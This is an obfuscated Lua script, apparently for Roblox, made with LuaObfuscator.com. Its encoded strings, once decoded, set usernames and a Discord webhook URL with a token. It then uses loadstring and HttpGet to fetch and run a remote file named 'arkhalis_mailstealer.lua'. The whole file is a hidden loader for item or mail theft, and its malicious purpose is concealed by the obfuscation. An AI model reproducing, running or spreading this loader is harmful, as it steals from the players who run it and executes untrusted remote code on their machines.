--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1271 -(226 + 1044))) -(v32-(1 -0))) + (878 -(282 + 595)))) ;return v84-(v84%(2 -1)) ;else local v85=(7128 -5491) -((1640 -(32 + 85)) + 114) ;local v86;while true do if (v85==0) then v86=(621 -(555 + 64))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 + (350 -(87 + 263)))) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v35=1;end end end local function v23()local v38=180 -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (1000 -(915 + 82)) + 1 ;v38=3 -2 ;end if (v38==(953 -(802 + (424 -274)))) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1 -0 ,1207 -((2555 -(998 + 488)) + 118) ) * ((4 -2)^(69 -37))) + v43 ;local v47=v20(v44,4 + 6 + 11 ,54 -23 );local v48=((v20(v44,32)==(1 + 0)) and  -(792 -(368 + 347 + 76))) or 1 ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * 0 ;else v47=3 -(774 -(201 + 571)) ;v45=442 -((1554 -(116 + 1022)) + (108 -82)) ;end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -(86 + 59 + 293)) ) * (v45 + (v46/((432 -((160 -116) + (1370 -984)))^52))) ;end local function v25(v49)local v50;if  not v49 then local v87=859 -(814 + 45) ;while true do if (v87==(0 -0)) then v49=v23();if (v49==(0 + (885 -(261 + 624)))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v66=(1081 -(1020 + 60)) + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1750 -(1013 + 736))) then else v55=nil;v56=nil;v52=2;end if (v52==(2 + 0)) then v57=nil;v58=nil;v52=7 -4 ;end if (v52~=(0 -0)) then else v53=867 -(550 + 317) ;v54=nil;v52=1;end if (v52==3) then v59=nil;while true do local v92=0 -0 ;while true do if (0~=v92) then else if (v53~=(0 -0)) then else local v97=0;while true do if (v97~=(2 -1)) then else v56={};v57={v54,v55,nil,v56};v97=2;end if (v97==2) then v53=1;break;end if (v97==0) then v54={};v55={};v97=1;end end end if (v53~=(3 -2)) then else v58=v23();v59={};for v100=1,v58 do local v101=0;local v102;local v103;local v104;while true do if (v101==0) then v102=0 -0 ;v103=nil;v101=1;end if (v101~=(3 -2)) then else v104=nil;while true do if (0~=v102) then else v103=v21();v104=nil;v102=1825 -(1195 + 629) ;end if (v102==(1 -0)) then if (v103==1) then v104=v21()~=0 ;elseif (v103==2) then v104=v24();elseif (v103==(244 -(187 + 54))) then v104=v25();end v59[v100]=v104;break;end end break;end end end v57[3]=v21();v53=2;end v92=781 -(162 + 618) ;end if ((1 + 0)~=v92) then else if (2~=v53) then else local v99=0;while true do if (v99==(1 + 0)) then return v57;end if (v99==(0 -0)) then for v145=1,v23() do local v146=0;local v147;local v148;local v149;while true do if (v146==0) then v147=0;v148=nil;v146=1 -0 ;end if (v146~=1) then else v149=nil;while true do if (v147==0) then local v159=0 + 0 ;while true do if (v159==0) then v148=0;v149=nil;v159=1637 -(1373 + 263) ;end if (v159==(1001 -(451 + 549))) then v147=1 + 0 ;break;end end end if ((1 -0)==v147) then while true do if (v148==(0 -0)) then v149=v21();if (v20(v149,1385 -(746 + 638) ,1)==0) then local v160=0;local v161;local v162;local v163;local v164;while true do if (v160==0) then local v165=0 + 0 ;while true do if ((0 -0)==v165) then v161=341 -(218 + 123) ;v162=nil;v165=1;end if (v165==(1582 -(1535 + 46))) then v160=1;break;end end end if (v160==(1 + 0)) then local v166=0;while true do if (v166==(1 + 0)) then v160=2;break;end if (v166==(560 -(306 + 254))) then v163=nil;v164=nil;v166=1;end end end if (v160==2) then while true do if (v161==(1 + 0)) then local v167=0 -0 ;local v168;while true do if (v167~=(1467 -(899 + 568))) then else v168=0;while true do if (v168==(1 + 0)) then v161=2;break;end if (v168==(0 -0)) then v164={v22(),v22(),nil,nil};if (v162==(572 -(426 + 146))) then local v177=0 + 0 ;local v178;while true do if (v177==0) then v178=0;while true do if (0==v178) then v164[3]=v22();v164[4]=v22();break;end end break;end end elseif (v162==1) then v164[1459 -(282 + 1174) ]=v23();elseif (v162==2) then v164[3]=v23() -((813 -(569 + 242))^(46 -30)) ;elseif (v162==(1 + 2)) then local v187=1024 -(706 + 318) ;local v188;while true do if (v187~=0) then else v188=1251 -(721 + 530) ;while true do if ((1271 -(945 + 326))~=v188) then else v164[7 -4 ]=v23() -(2^(15 + 1)) ;v164[4]=v22();break;end end break;end end end v168=701 -(271 + 429) ;end end break;end end end if (v161~=(3 + 0)) then else if (v20(v163,1503 -(1408 + 92) ,1089 -(461 + 625) )~=(1289 -(993 + 295))) then else v164[1 + 3 ]=v59[v164[1175 -(418 + 753) ]];end v54[v145]=v164;break;end if (v161==(1 + 1)) then local v170=0 + 0 ;local v171;local v172;while true do if (v170==(1 + 0)) then while true do if (v171~=0) then else v172=0;while true do if (v172==0) then if (v20(v163,1 + 0 ,530 -(406 + 123) )==(1770 -(1749 + 20))) then v164[1 + 1 ]=v59[v164[1324 -(1249 + 73) ]];end if (v20(v163,1 + 1 ,1147 -(466 + 679) )~=(2 -1)) then else v164[8 -5 ]=v59[v164[1903 -(106 + 1794) ]];end v172=1 + 0 ;end if (v172~=1) then else v161=3;break;end end break;end end break;end if (v170==0) then v171=0;v172=nil;v170=1;end end end if (v161~=0) then else local v173=0 + 0 ;local v174;while true do if (0==v173) then v174=0 -0 ;while true do if (v174~=0) then else v162=v20(v149,2,3);v163=v20(v149,4,6);v174=1;end if (1==v174) then v161=2 -1 ;break;end end break;end end end end break;end end end break;end end break;end end break;end end end for v150=1,v23() do v55[v150-1 ]=v28();end v99=1;end end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3];else local v107=0;local v108;while true do if (v107==0) then v108=v80[2];v78[v108]=v78[v108](v13(v78,v108 + 1 ,v73));break;end end end elseif (v81>2) then do return;end else v78[v80[2]]=v80[3];end elseif (v81<=5) then if (v81==4) then v78[v80[2]][v80[3]]=v80[4];else local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==1) then v73=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v155=v114,v73 do v117=v117 + 1 ;v78[v155]=v115[v117];end break;end if (v113==0) then v114=v80[2];v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v113=1;end end end elseif (v81<=6) then local v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));elseif (v81==7) then do return;end else local v134=v80[2];local v135=v78[v80[3]];v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];end elseif (v81<=12) then if (v81<=10) then if (v81==9) then v78[v80[2]]();else v78[v80[2]][v80[3]]=v80[4];end elseif (v81==11) then v78[v80[2]]=v62[v80[3]];else v78[v80[2]]();end elseif (v81<=14) then if (v81==13) then local v124=v80[2];local v125,v126=v71(v78[v124](v13(v78,v124 + 1 ,v80[3])));v73=(v126 + v124) -1 ;local v127=0;for v131=v124,v73 do v127=v127 + 1 ;v78[v131]=v125[v127];end else v78[v80[2]]=v62[v80[3]];end elseif (v81<=15) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==16) then local v139=v80[2];local v140=v78[v80[3]];v78[v139 + 1 ]=v140;v78[v139]=v140[v80[4]];else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703093O00557365726E616D6531030F3O0066722O657663612O63666F72796F7503093O00557365726E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31343236303431362O3332332O303339322F55546D796D2D6F316968306166396467766E50487037305A5077444F585A747930423365356965764938745771555F5741793665725F505451674C6C55646570386D4B5F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C7561000F3O00120E3O00013O00300A3O0002000300120E3O00013O00300A3O0004000300120E3O00013O00300A3O0005000600120E3O00073O00120E000100083O0020080001000100090012020003000A4O000F000400014O000D000100044O00065O00022O000C3O000100012O00073O00017O00",v9(),...);end
